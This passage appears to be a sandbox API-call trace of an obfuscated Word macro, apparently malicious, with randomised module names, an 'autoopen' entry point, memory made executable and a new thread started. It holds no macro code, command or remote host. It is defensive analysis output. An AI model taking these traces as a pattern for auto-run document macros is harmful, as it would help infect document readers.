lpString1="iAAB4Dx", cchCount1=-1, lpString2="GB_C_A", cchCount2=-1) returned 3 [0068.065] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="iAAB4Dx", cchCount1=-1, lpString2="iAAB4Dx", cchCount2=-1) returned 2 [0068.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GB_C_A", cchWideChar=7, lpMultiByteStr=0x147860, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GB_C_A", lpUsedDefaultChar=0x0) returned 7 [0068.065] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GB_C_A") returned 0x10a9c8 [0068.065] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="GB_C_A") returned 0x10a9c8 [0068.065] bsearch (_Key=0x146798, _Base=0x67c2c60, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee37b219c) returned 0x67c2c68 [0068.065] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="GB_C_A", cchCount1=-1, lpString2="GB_C_A", cchCount2=-1) returned 2 [0068.066] malloc (_Size=0x40) returned 0x251a390 [0068.066] malloc (_Size=0x40) returned 0x251cac0 [0068.066] malloc (_Size=0x40) returned 0x251cb10 [0068.071] malloc (_Size=0x90) returned 0x251cb60 [0068.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project.GB_C_A.autoopen", cchWideChar=-1, lpMultiByteStr=0x147b60, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project.GB_C_A.autoopen", lpUsedDefaultChar=0x0) returned 24 [0068.072] strncpy_s (in: _Dst=0x682e7c0, _DstSize=0x19, _Src="Project.GB_C_A.autoopen", _MaxCount=0x17 | out: _Dst="Project.GB_C_A.autoopen") returned 0x0 [0068.072] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Project") returned 0x10ae2d [0068.072] bsearch (_Key=0x146a78, _Base=0x67c2c60, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee37b219c) returned 0x0 [0068.072] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="GB_C_A", cchCount2=-1) returned 3 [0068.072] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="iAAB4Dx", cchCount2=-1) returned 3 [0068.072] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Project", cchCount1=-1, lpString2="Project", cchCount2=-1) returned 2 [0068.072] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="GB_C_A") returned 0x10a9c8 [0068.072] bsearch (_Key=0x146a78, _Base=0x67c2c60, _NumOfElements=0x3, _SizeOfElements=0x8, _PtFuncCompare=0x7fee37b219c) returned 0x67c2c68 [0068.072] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="GB_C_A", cchCount1=-1, lpString2="GB_C_A", cchCount2=-1) returned 2 [0068.072] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="autoopen") returned 0x102ad9 [0068.074] _mbscpy_s (in: _Dst=0x146850, _DstSizeInBytes=0x9, _Src=0x3ba1586 | out: _Dst=0x146850) returned 0x0 [0068.075] _mbscpy_s (in: _Dst=0x146850, _DstSizeInBytes=0x9, _Src=0x3ba2e16 | out: _Dst=0x146850) returned 0x0 [0068.075] _mbscpy_s (in: _Dst=0x146850, _DstSizeInBytes=0x7, _Src=0x3cb0abe | out: _Dst=0x146850) returned 0x0 [0068.075] _mbscpy_s (in: _Dst=0x146850, _DstSizeInBytes=0x9, _Src=0x3ba27a2 | out: _Dst=0x146850) returned 0x0 [0068.075] _mbscpy_s (in: _Dst=0x146850, _DstSizeInBytes=0x8, _Src=0x3cc054a | out: _Dst=0x146850) returned 0x0 [0068.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="035e95ca91", cchWideChar=11, lpMultiByteStr=0x146e20, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="035e95ca91", lpUsedDefaultChar=0x0) returned 11 [0068.075] GetLocalTime (in: lpSystemTime=0x146f08 | out: lpSystemTime=0x146f08*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0x100)) [0068.075] _ultow_s (in: _Value=0x5e95ca91, _Buffer=0xaf2bb6c, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e95ca91") returned 0x0 [0068.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="065e95ca91", cchWideChar=11, lpMultiByteStr=0x146e60, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="065e95ca91", lpUsedDefaultChar=0x0) returned 11 [0068.075] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf03590 [0068.075] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a190a0 [0068.075] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a192f0 [0068.075] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a19540 [0068.076] IMalloc:Free (This=0x7fefec05380, pv=0x62fddf0) [0068.076] _mbscpy_s (in: _Dst=0x1460d0, _DstSizeInBytes=0x8, _Src=0x3cb1596 | out: _Dst=0x1460d0) returned 0x0 [0068.076] IMalloc:Free (This=0x7fefec05380, pv=0x62fddf0) [0068.077] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a59890, cb=0x20) returned 0x682e6d0 [0068.077] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a598b0, cb=0x28) returned 0x682e730 [0068.077] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0068.077] IUnknown:AddRef (This=0x665ba50) returned 0x4 [0068.077] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1464a8, pDummy=0x0 | out: ppTLibAttr=0x1464a8, pDummy=0x0) returned 0x0 [0068.077] ITypeLib:RemoteGetDocumentation (in: This=0x665ba50, index=-1, refPtrFlags=0x1464c0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x77015bba | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x77015bba) returned 0x0 [0068.077] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69fa1d0 [0068.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchWideChar=66, lpMultiByteStr=0x146530, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", lpUsedDefaultChar=0x0) returned 66 [0068.077] strcpy_s (in: _Dst=0x6a16cc0, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0068.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x146640, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0068.077] strcpy_s (in: _Dst=0x6a16d10, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0068.077] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69fa620 [0068.077] IUnknown:AddRef (This=0x665ba50) returned 0x5 [0068.077] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.077] IUnknown:Release (This=0x665ba50) returned 0x4 [0068.077] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 5 [0068.078] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0068.078] IUnknown:AddRef (This=0x631b4c0) returned 0x9 [0068.078] ITypeLib:RemoteGetLibAttr (in: This=0x631b4c0, ppTLibAttr=0x1464a8, pDummy=0x0 | out: ppTLibAttr=0x1464a8, pDummy=0x0) returned 0x0 [0068.078] ITypeLib:RemoteGetDocumentation (in: This=0x631b4c0, index=-1, refPtrFlags=0x1464c0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0068.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x146530, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLBVBE7.DLL", lpUsedDefaultChar=0x0) returned 58 [0068.078] strcpy_s (in: _Dst=0x6a16d80, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0068.078] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x146640, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0068.078] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a19790 [0068.078] strcpy_s (in: _Dst=0x6a197b8, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0068.078] IUnknown:AddRef (This=0x631b4c0) returned 0xa [0068.078] ITypeLib:LocalReleaseTLibAttr (This=0x631b4c0) returned 0x0 [0068.078] IUnknown:Release (This=0x631b4c0) returned 0x9 [0068.078] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned -50 [0068.078] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -5 [0068.078] _wcsicmp (_String1="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0 [0068.079] IUnknown:AddRef (This=0x665bd20) returned 0x5 [0068.079] ITypeLib:RemoteGetLibAttr (in: This=0x665bd20, ppTLibAttr=0x1464a8, pDummy=0x0 | out: ppTLibAttr=0x1464a8, pDummy=0x0) returned 0x0 [0068.079] ITypeLib:RemoteGetDocumentation (in: This=0x665bd20, index=-1, refPtrFlags=0x1464c0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0068.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=31, lpMultiByteStr=0x146530, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\stdole2.tlb", lpUsedDefaultChar=0x0) returned 31 [0068.079] strcpy_s (in: _Dst=0x6a19828, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0068.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x146640, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0068.079] strcpy_s (in: _Dst=0x6a19850, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0068.079] IUnknown:AddRef (This=0x665bd20) returned 0x6 [0068.079] ITypeLib:LocalReleaseTLibAttr (This=0x665bd20) returned 0x0 [0068.079] IUnknown:Release (This=0x665bd20) returned 0x5 [0068.119] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x20) returned 0x682e760 [0068.119] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 2 [0068.119] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 2 [0068.119] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 2 [0068.119] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\CNormal") returned 4 [0068.120] _wcsicmp (_String1="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _String2="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0 [0068.120] IUnknown:AddRef (This=0x665b4b0) returned 0x3 [0068.120] ITypeLib:RemoteGetLibAttr (in: This=0x665b4b0, ppTLibAttr=0x1464a8, pDummy=0x0 | out: ppTLibAttr=0x1464a8, pDummy=0x0) returned 0x0 [0068.120] ITypeLib:RemoteGetDocumentation (in: This=0x665b4b0, index=-1, refPtrFlags=0x1464c0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0068.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=63, lpMultiByteStr=0x146530, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpUsedDefaultChar=0x0) returned 63 [0068.120] strcpy_s (in: _Dst=0x6a198c0, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0068.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=7, lpMultiByteStr=0x146640, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 7 [0068.120] strcpy_s (in: _Dst=0x6a19908, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0068.120] IUnknown:AddRef (This=0x665b4b0) returned 0x4 [0068.120] ITypeLib:LocalReleaseTLibAttr (This=0x665b4b0) returned 0x0 [0068.120] IUnknown:Release (This=0x665b4b0) returned 0x3 [0068.120] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c60) [0068.120] IMalloc:Alloc (This=0x7fefec05380, cb=0x40) returned 0x68e09e0 [0068.120] IMalloc:Alloc (This=0x7fefec05380, cb=0x40) returned 0x68dedc0 [0068.120] strcpy_s (in: _Dst=0x6a19960, _DstSize=0x9, _Src="tDAAA44k" | out: _Dst="tDAAA44k") returned 0x0 [0068.120] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.120] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.120] GetCurrentProcess () returned 0xffffffffffffffff [0068.120] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x45) returned 1 [0068.120] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.120] strcpy_s (in: _Dst=0x6a19978, _DstSize=0x9, _Src="autoopen" | out: _Dst="autoopen") returned 0x0 [0068.120] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.120] GetCurrentProcess () returned 0xffffffffffffffff [0068.121] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x3d) returned 1 [0068.121] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.121] strcpy_s (in: _Dst=0x6a19990, _DstSize=0x9, _Src="zxACAo_Z" | out: _Dst="zxACAo_Z") returned 0x0 [0068.121] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a199e0 [0068.121] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.121] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.121] GetCurrentProcess () returned 0xffffffffffffffff [0068.121] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x45) returned 1 [0068.121] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.121] strcpy_s (in: _Dst=0x6a199a8, _DstSize=0x7, _Src="LAcwo_" | out: _Dst="LAcwo_") returned 0x0 [0068.121] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.121] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.121] GetCurrentProcess () returned 0xffffffffffffffff [0068.121] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x45) returned 1 [0068.121] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.121] IMalloc:Alloc (This=0x7fefec05380, cb=0x50) returned 0x680a5e0 [0068.121] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0xafb5aa0 [0068.121] strcpy_s (in: _Dst=0xafb5ac8, _DstSize=0x9, _Src="mAoAQBAo" | out: _Dst="mAoAQBAo") returned 0x0 [0068.121] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69faa70 [0068.121] strcpy_s (in: _Dst=0x6a170b8, _DstSize=0x8, _Src="HZDUAAA" | out: _Dst="HZDUAAA") returned 0x0 [0068.121] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.121] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.121] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.121] GetCurrentProcess () returned 0xffffffffffffffff [0068.121] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x4d) returned 1 [0068.121] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.121] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0xafb5cf0 [0068.121] strcpy_s (in: _Dst=0xafb5ae0, _DstSize=0x8, _Src="C_1BxA_" | out: _Dst="C_1BxA_") returned 0x0 [0068.121] IMalloc:Alloc (This=0x7fefec05380, cb=0x26d) returned 0xafc95c0 [0068.121] IMalloc:GetSize (This=0x7fefec05380, pv=0xafc95c0) returned 0x26d [0068.121] GetCurrentProcess () returned 0xffffffffffffffff [0068.122] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafc95c0, dwSize=0x45) returned 1 [0068.122] IMalloc:Free (This=0x7fefec05380, pv=0xafc95c0) [0068.122] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x412) returned 0x69faec0 [0068.122] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c60) [0068.122] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf61390 [0068.122] IMalloc:GetSize (This=0x7fefec05380, pv=0xaf61390) returned 0x80 [0068.122] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x67c2c60 [0068.122] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="tDAAA44k") returned 0x10e29c [0068.122] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x67c2b60 [0068.122] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="autoopen") returned 0x102ad9 [0068.122] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x67c2b00 [0068.122] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="zxACAo_Z") returned 0x107cde [0068.122] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x67c2b40 [0068.122] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="LAcwo_") returned 0x104db1 [0068.122] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x67c2aa0 [0068.122] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="mAoAQBAo") returned 0x101ae9 [0068.122] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x67c14e0 [0068.122] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="C_1BxA_") returned 0x10ce2b [0068.122] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="autoopen", cchCount1=-1, lpString2="mAoAQBAo", cchCount2=-1) returned 1 [0068.122] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="autoopen", cchCount1=-1, lpString2="autoopen", cchCount2=-1) returned 2 [0068.122] IMalloc:Alloc (This=0x7fefec05380, cb=0x18) returned 0x67c2c40 [0068.122] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c40) [0068.122] free (_Block=0x0) [0068.122] free (_Block=0x0) [0068.122] free (_Block=0x0) [0068.122] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2c40 [0068.122] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c40) [0068.123] GetCurrentProcess () returned 0xffffffffffffffff [0068.123] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19148, dwSize=0x8) returned 1 [0068.123] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2c40 [0068.123] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c40) [0068.123] GetCurrentProcess () returned 0xffffffffffffffff [0068.123] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19208, dwSize=0x8) returned 1 [0068.123] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2c40 [0068.123] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c40) [0068.123] GetCurrentProcess () returned 0xffffffffffffffff [0068.123] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19a18, dwSize=0x8) returned 1 [0068.123] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2c40 [0068.123] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c40) [0068.123] GetCurrentProcess () returned 0xffffffffffffffff [0068.123] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19ad8, dwSize=0x8) returned 1 [0068.123] IMalloc:Alloc (This=0x7fefec05380, cb=0x11) returned 0x67c2c40 [0068.123] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c40) [0068.123] GetCurrentProcess () returned 0xffffffffffffffff [0068.123] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19b98, dwSize=0x8) returned 1 [0068.123] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2c40 [0068.123] IMalloc:Free (This=0x7fefec05380, pv=0x67c2c40) [0068.123] GetCurrentProcess () returned 0xffffffffffffffff [0068.123] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5db8, dwSize=0x8) returned 1 [0068.123] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19148, dwSize=0x8) returned 1 [0068.123] GetCurrentProcess () returned 0xffffffffffffffff [0068.123] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19208, dwSize=0x8) returned 1 [0068.123] GetCurrentProcess () returned 0xffffffffffffffff [0068.123] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19a18, dwSize=0x8) returned 1 [0068.123] GetCurrentProcess () returned 0xffffffffffffffff [0068.124] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19ad8, dwSize=0x8) returned 1 [0068.124] GetCurrentProcess () returned 0xffffffffffffffff [0068.124] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19b98, dwSize=0x8) returned 1 [0068.124] GetCurrentProcess () returned 0xffffffffffffffff [0068.124] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0xafb5db8, dwSize=0x8) returned 1 [0068.124] free (_Block=0x0) [0068.124] free (_Block=0x0) [0068.124] free (_Block=0x0) [0068.124] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x6a19254, dwSize=0x3d) returned 1 [0068.124] VirtualProtect (in: lpAddress=0x6a19254, dwSize=0x40, flNewProtect=0x40, lpflOldProtect=0x1461dc | out: lpflOldProtect=0x1461dc*=0x4) returned 1 [0068.303] IMalloc:Alloc (This=0x7fefec05380, cb=0x40) returned 0x68debe0 [0068.303] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", ulOptions=0x0, samDesired=0x1, phkResult=0x146a20 | out: phkResult=0x146a20*=0xb58) returned 0x0 [0068.304] RegQueryValueExA (in: hKey=0xb58, lpValueName="VbaCapability", lpReserved=0x0, lpType=0x0, lpData=0x146a18, lpcbData=0x146a10*=0x4 | out: lpType=0x0, lpData=0x146a18*=0xd8, lpcbData=0x146a10*=0x4) returned 0x2 [0068.304] RegCloseKey (hKey=0xb58) returned 0x0 [0068.304] DispCallFunc (pvInstance=0x0, oVft=0x6a1925c, cc=0x4, vtReturn=0x0, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x146c30) returned 0x0 [0068.306] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x7fee3781778, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x146720 | out: lpThreadId=0x146720*=0xac0) returned 0xb58 [0068.308] PeekMessageA (in: lpMsg=0x1466c0, hWnd=0x101f4, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x1466c0) returned 0 [0068.310] GetActiveWindow () returned 0x101ba [0068.312] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598b0 [0068.312] IUnknown:QueryInterface (in: This=0x695c8c0, 